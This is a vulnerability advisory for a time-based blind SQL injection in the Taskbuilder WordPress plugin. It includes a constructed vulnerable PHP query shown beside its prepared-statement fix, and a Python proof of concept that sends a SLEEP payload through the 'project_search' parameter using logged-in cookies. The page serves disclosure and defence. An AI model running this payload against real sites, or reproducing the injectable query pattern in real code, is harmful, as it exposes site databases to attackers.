Security Vulnerability Report
CVE-2026-6225 CVSS 6.5 MEDIUM

CVE-2026-6225

Published: 2026-05-14 07:16:20
Last Modified: 2026-05-14 14:28:41

Description

The Taskbuilder – Project Management & Task Management Tool With Kanban Board plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'project_search' parameter in all versions up to, and including, 5.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
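The advisory names the root cause as insufficient escaping plus a query that is not prepared. The following is an added, constructed WordPress example (not the Taskbuilder plugin's code; the table name, function names and AJAX action are assumptions) showing that CWE-89 pattern for a search parameter next to the `$wpdb->prepare()` form that closes it:

```php
<?php
// Constructed example, NOT the Taskbuilder plugin's source. Table name
// 'tb_projects', the function names and the AJAX action are assumptions.

// Vulnerable pattern: user input interpolated straight into the SQL text.
function tb_search_projects_vulnerable( $search ) {
    global $wpdb;
    $table = $wpdb->prefix . 'tb_projects'; // hypothetical table
    // No escaping, no prepare: a single quote in $search terminates the
    // literal and whatever follows is executed as SQL (CWE-89).
    $sql = "SELECT id, name FROM {$table} WHERE name LIKE '%{$search}%'";
    return $wpdb->get_results( $sql );
}

// Hardened pattern: the value is bound through prepare(), so it can only
// ever be a quoted string literal, and LIKE wildcards are neutralised.
function tb_search_projects_fixed( $search ) {
    global $wpdb;
    $table = $wpdb->prefix . 'tb_projects'; // hypothetical table
    // esc_like() escapes % and _ so the caller cannot widen the match;
    // prepare() with %s quotes and escapes the value as data, not SQL.
    $like = '%' . $wpdb->esc_like( sanitize_text_field( $search ) ) . '%';
    $sql  = $wpdb->prepare(
        "SELECT id, name FROM {$table} WHERE name LIKE %s LIMIT %d",
        $like,
        50
    );
    return $wpdb->get_results( $sql );
}

// Assumed AJAX wiring. The nonce check is defence in depth for CSRF; it
// does not replace the prepared statement, which is the injection fix.
add_action( 'wp_ajax_taskbuilder_project_search', function () {
    check_ajax_referer( 'taskbuilder_search', 'nonce' );
    $search = isset( $_POST['project_search'] )
        ? wp_unslash( $_POST['project_search'] )
        : '';
    wp_send_json_success( tb_search_projects_fixed( $search ) );
} );
```

With the prepared form, the time-based payload from the PoC below is matched literally against the name column and never reaches the SQL parser as code.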

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Taskbuilder WordPress Plugin <= 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-6225 (Time-based Blind SQL Injection)
import requests
import time


def check_sqli(url, cookies):
    # The vulnerable parameter is 'project_search'
    # Endpoint might be admin-ajax.php or specific plugin page
    target_endpoint = url + "/wp-admin/admin-ajax.php"
    # Payload for time-based blind SQL injection
    # Adjust the sleep time if network latency is high
    payload = "1' AND (SELECT SLEEP(5))#"
    data = {
        "action": "taskbuilder_project_search",  # Action name might vary, check plugin source
        "project_search": payload,
    }
    try:
        start_time = time.time()
        response = requests.post(target_endpoint, data=data, cookies=cookies, timeout=10)
        end_time = time.time()
        # If response takes longer than sleep time, it indicates vulnerability
        if end_time - start_time >= 5:
            print("[+] Vulnerability confirmed: Time delay detected.")
        else:
            print("[-] Vulnerability not detected or patch applied.")
    except Exception as e:
        print(f"Error: {e}")


# Usage: Replace with valid target URL and authenticated cookies
target_url = "http://example.com"
auth_cookies = {"wordpress_logged_in_...": "session_cookie_here"}
check_sqli(target_url, auth_cookies)
```

References

https://plugins.trac.wordpress.org/changeset/3507782/taskbuilder
https://www.wordfence.com/threat-intel/vulnerabilities/id/561479ed-2402-4511-9344-d6b9e28f2f33?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6225", "sourceIdentifier": "[email protected]", "published": "2026-05-14T07:16:20.373", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Taskbuilder – Project Management & Task Management Tool With Kanban Board plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'project_search' parameter in all versions up to, and including, 5.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3507782/taskbuilder", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/561479ed-2402-4511-9344-d6b9e28f2f33?source=cve", "source": "[email protected]"}]}}